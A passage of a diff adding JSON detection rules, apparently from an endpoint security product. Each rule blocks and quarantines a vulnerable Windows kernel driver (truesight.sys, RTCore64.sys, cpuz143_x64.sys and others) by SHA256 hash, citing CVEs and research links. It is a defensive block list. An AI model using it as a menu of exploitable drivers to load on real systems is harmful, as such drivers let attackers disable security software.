"2026-03-23T11:45:30.835809Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d3e4b057da5d3e93d142cee093c78e6f59e0b1fbc85a4dc32af7d53c998945f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2aca4c7-4823-5544-a052-8eb8221c7b87", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.496036Z", + "creation_date": "2026-03-23T11:45:31.496039Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.496045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fc41b0d0bbd4e623dcc2f0435392126f3fa0f36b68708d63cbf7e0ef4b2e4d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2b0b9b1-5432-5bcd-a67a-c9bfd8b63486", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620883Z", + "creation_date": "2026-03-23T11:45:29.620885Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d453110c9050320419c2064ddea08230de6c76f86b07dc58112208e3d24a809e", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2b4db88-547c-590a-9229-52eff1c2577b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153471Z", + "creation_date": "2026-03-23T11:45:31.153473Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153478Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74d3f294eccc335ec98050f305f49bb6465568c964ba1665047665b2661a7565", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2bcf3bb-3e1f-56bb-8541-01cf265309ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611677Z", + "creation_date": "2026-03-23T11:45:29.611679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611684Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd7754a6ec6bf19724fb266ec4f1d02607e9b310791d8725d7db5ac84d5430e2", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2bd5269-d37b-5526-aa34-782af4260050", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477230Z", + "creation_date": "2026-03-23T11:45:30.477233Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477242Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d80714d87529bb0bc7abcc12d768c43a697fbca59741c38fa0b46900da4db30e", + "comment": "Vulnerable Kernel Driver 
(aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2c0d129-4373-5ad4-b06e-d59c34924505", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615398Z", + "creation_date": "2026-03-23T11:45:29.615400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615407Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d734d6443a707d601d76577692dc613b35201518856d0189b037f7a4fbd420d", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2c5bb23-c541-5702-aecf-e2f17e620e69", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460737Z", + "creation_date": 
"2026-03-23T11:45:30.460740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0aca4447ee54d635f76b941f6100b829dc8b2e0df27bdf584acb90f15f12fbda", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2d7f25a-7773-521a-8533-602d8b820b19", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826710Z", + "creation_date": "2026-03-23T11:45:31.826713Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826718Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8b79681480130e33478c8a922ab98b35d3f9b4f2f1fd15d3047448014193098", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2e29b3a-5e8a-5e38-b37a-c4713e596759", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817592Z", + "creation_date": "2026-03-23T11:45:30.817593Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817599Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6c11d3bec2a94c40933ec1d3604cfe87617ba828b14f4cded6cfe85656debc0", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2f0926f-f8b0-5098-85fb-5385fbd3f2f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487451Z", + "creation_date": "2026-03-23T11:45:31.487453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487459Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "515c61e521dce56afd4814e8c6810dc9b325fe4c4c1ff90ecf2434bf2869e816", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2f53f1e-43ab-522d-8216-bbd553a6c4c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824184Z", + "creation_date": "2026-03-23T11:45:30.824187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce6636dd6b217d50a39eeaf3dcdcaf0643aeb1caacb4353f60e208e6e7d1ab11", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2fd906e-e1bd-5045-945c-a9bf508b818d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823034Z", + "creation_date": "2026-03-23T11:45:31.823037Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823046Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e11a326b6f516502e5dd37c4a1867ed6f47f2f008e1e562f26c4a09af2466297", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3091249-23e5-54e2-9211-9e24d22d0dfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153907Z", + "creation_date": "2026-03-23T11:45:31.153909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153914Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"5ee3f6dc6ce25126481c4ab68f01344a8c8c7f68d0fabc61a9c02a82c2f91e3a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d30913ba-c66d-5525-b61a-a8f02ee87f4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829554Z", + "creation_date": "2026-03-23T11:45:30.829556Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829562Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "877fffa31cfbcb74d20d770abac91a76c686b1d315326eb14285bc6c92366cbe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d313e4c7-4189-5d51-b8bb-a2ce072f81d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980768Z", + "creation_date": "2026-03-23T11:45:29.980770Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980775Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf", + "comment": "Vulnerable Kernel Driver (aka PanMonFltX64.sys) [https://www.loldrivers.io/drivers/40bfb01b-d251-4c2c-952e-052a89a76f5b/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d32ff0d2-ca03-5c34-aa67-079960f93ed5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477611Z", + "creation_date": "2026-03-23T11:45:31.477615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477625Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2414ad09451dae4811952d9696de5e37658091dc0363bc96cf0985ff19e9d97a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d338006c-56ad-5d48-bb8f-f2080ceea0f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621124Z", + "creation_date": "2026-03-23T11:45:29.621126Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621131Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a20ca8f9361eb892257b3693095ffeee61457dc4e22d9b119e3a9f3a1507069", + "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d33e4e78-526a-5941-a46c-53471b051b37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485644Z", + "creation_date": "2026-03-23T11:45:31.485647Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71ec6fc98c2a2c577e13745f0ef4637d780af82fa569985eb584774669a20cda", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d33f9717-2c0c-5308-9b71-ba6da332678d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155523Z", + "creation_date": "2026-03-23T11:45:31.155525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eddd681692bb34b3025fefe4880792c5358bd41c61c89c6aba47ca110526e9a4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d342b358-667c-5b9a-b72d-a0b59cd4753a", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831766Z", + "creation_date": "2026-03-23T11:45:30.831768Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831774Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c3f7b3e020495d9742a9211d64adb93b2950bdd6748c101208f446cbd872e5b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3503940-6000-529f-8a0b-1df34e5d34c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621811Z", + "creation_date": "2026-03-23T11:45:29.621813Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.621819Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b1af050481bda270a08ae873224a142c8b2119eeda59d3a04b1f6d66715a8c8", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d36ad9dd-0ee6-50a9-8c51-53db71c353b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830651Z", + "creation_date": "2026-03-23T11:45:30.830653Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6177613652eaf63a2cfc1bd377b5159980f2fb2ce12b88c2ad92a0e89157381", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d379808e-a35d-56ae-8b3e-750e784973ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495922Z", + "creation_date": "2026-03-23T11:45:31.495924Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20f7eb43732e7813d3af0a34e543f0cd3ebfc20f2c0f33139e0b3fe03c49dc45", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d37ca3f7-2cc8-5fe4-9558-9c5f29072061", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984493Z", + "creation_date": "2026-03-23T11:45:29.984495Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
